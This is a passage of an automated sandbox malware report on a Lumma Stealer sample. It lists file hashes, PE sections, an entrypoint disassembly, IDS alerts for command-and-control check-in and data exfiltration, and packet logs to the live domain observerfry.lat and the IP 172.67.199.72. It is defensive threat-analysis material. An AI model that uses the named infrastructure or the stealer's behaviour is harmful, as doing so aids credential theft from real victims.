                                                                                        http://crl.microp;yO9EAqDV15.exe, 00000000.00000003.2126187612.00000000017F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            172.67.199.72
                                                                                            		observerfry.latUnited States
                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1580269
                                                                                            Start date and time:2024-12-24 08:34:14 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 5m 44s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:5
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:yO9EAqDV15.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:dcbbfbd538d99feec781122f6c905c1b.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                            EGA Information:Failed
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 0
                                                                                            • Number of non-executed functions: 1
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 4.245.163.56
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target yO9EAqDV15.exe, PID 7412 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            02:35:33API Interceptor8x Sleep call for process: yO9EAqDV15.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            172.67.199.72Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                              ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                                NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                  t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                    zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                      0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                        NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                          U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            observerfry.latCollapse.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            xlSzrIs5h6.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.36.201
                                                                                                            ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            NxqDwaYpbp.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.36.201
                                                                                                            NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            2jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.36.201
                                                                                                            OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.36.201
                                                                                                            fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.36.201
                                                                                                            t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.36.201

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSsingl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.37.173
                                                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.169.205
                                                                                                            qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.195.241
                                                                                                            txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.151.61
                                                                                                            hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                            • 172.65.251.78
                                                                                                            nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 8.6.115.225
                                                                                                            nklmips.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 104.29.132.180
                                                                                                            eCompleted_419z.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 104.18.95.41
                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.177.88

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.199.72
                                                                                                            qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            Setup_W.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72
                                                                                                            Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.199.72

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            No created / dropped files found

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.947941979248466
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:yO9EAqDV15.exe
                                                                                                            File size:1'884'672 bytes
                                                                                                            MD5:dcbbfbd538d99feec781122f6c905c1b
                                                                                                            SHA1:79c4ae40ce7ad4cdb319e7021d21b99f0390725f
                                                                                                            SHA256:08c295782e51777d84b3ab08c49b1d3bedb4126fb88ed9ef47aa81fe8181adea
                                                                                                            SHA512:766b8cdb35ea1ebf3fb19eb76ea257707fd3a2e768fb2aa68a67c20375bd1988b9ba08371c4e3f2941b6ac35987fd2561be6f28b8ab8f97651ee5254c95ff427
                                                                                                            SSDEEP:49152:zlyk8ltRYFManGAwuIGC0oLAegMBu6eiE:hyk81vWjwuICog8de
                                                                                                            TLSH:9C95334BFE1051B2C4469A72ACD25B0E8BBC062C5CB526540F3997BA8F93FFC7352616
                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................J...........@...........................J...........@.................................Y@..m..

                                                                                                            File Icon

                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x8a8000
                                                                                                            Entrypoint Section:.taggant
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp 00007F7F08E952BAh
                                                                                                            push fs
                                                                                                            sbb al, 00h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            jmp 00007F7F08E972B5h
                                                                                                            add byte ptr [0000000Ah], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax+00000000h], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [esi], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            pop es
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax+eax], bl
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add dword ptr [eax+00000000h], eax
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add dword ptr [edx], ecx
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            xor byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            or byte ptr [eax+00000000h], al
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            pop es
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dl
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [edi], al
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [esi], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            0x10000x520000x26400c91c2d8508283e426924795979ec5bccFalse0.9995212928921569data7.984642934017876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            0x550000x2af0000x200f63e024bac2a8b939892501bf48d40f6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            nhmyvknl0x3040000x1a30000x1a2200c31dd1aefa4ba90d92b4a37118030779False0.994432571935725data7.953955254723583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            wbokqakx0x4a70000x10000x4008e6720b9adc964c57d460cada3795509False0.7490234375data5.983379105213653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .taggant0x4a80000x30000x2200a52452e23a7bed6bc90ffe82f5bf97d5False0.0915670955882353DOS executable (COM)1.1675038190249605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            kernel32.dlllstrcpy

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-24T08:35:33.462263+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:34.211279+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:34.211279+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:35.436820+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:36.203824+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:36.203824+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:37.820054+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:40.333242+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:42.550856+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:45.127460+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:45.894729+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:47.664337+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.199.72443TCP
                                                                                                            2024-12-24T08:35:52.048837+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.199.72443TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 24, 2024 08:35:32.238940001 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:32.239023924 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:32.239168882 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:32.242435932 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:32.242461920 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:33.462084055 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:33.462263107 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:33.468462944 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:33.468499899 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:33.468854904 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:33.517394066 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:33.559871912 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:33.559912920 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:33.560045004 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:34.211294889 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:34.211385965 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:34.211585045 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:34.213630915 CET49730443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:34.213659048 CET44349730172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:34.223912001 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:34.223962069 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:34.224050045 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:34.225025892 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:34.225044966 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:35.436697960 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:35.436820030 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:35.438590050 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:35.438602924 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:35.439202070 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:35.440536976 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:35.440536976 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:35.440614939 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.203834057 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.203888893 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.203922033 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.203952074 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.203979015 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.203982115 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.204021931 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.204041958 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.204076052 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.206510067 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.214951038 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.214994907 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.215050936 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.215081930 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.218718052 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.223329067 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.267420053 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.323235989 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.376857996 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.395689964 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.399842978 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.399898052 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.399990082 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.400016069 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.400069952 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.400212049 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.400230885 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.400264025 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.400270939 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.596048117 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.596091986 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.596198082 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.596633911 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.596648932 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:37.819878101 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:37.820054054 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:38.048346043 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:38.048363924 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:38.049659014 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:38.052405119 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:38.052575111 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:38.052645922 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:38.052702904 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:38.052711964 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:39.003304958 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:39.003416061 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:39.003478050 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:39.003709078 CET49732443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:39.003726959 CET44349732172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:39.118413925 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:39.118463993 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:39.118534088 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:39.118880033 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:39.118896008 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:40.333048105 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:40.333241940 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:40.335077047 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:40.335097075 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:40.335470915 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:40.336786985 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:40.336920977 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:40.336955070 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:41.108360052 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:41.108467102 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:41.108570099 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:41.108905077 CET49733443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:41.108922005 CET44349733172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:41.338259935 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:41.338304043 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:41.338376999 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:41.338812113 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:41.338824034 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:42.550774097 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:42.550856113 CET49734443192.168.2.4172.67.199.72
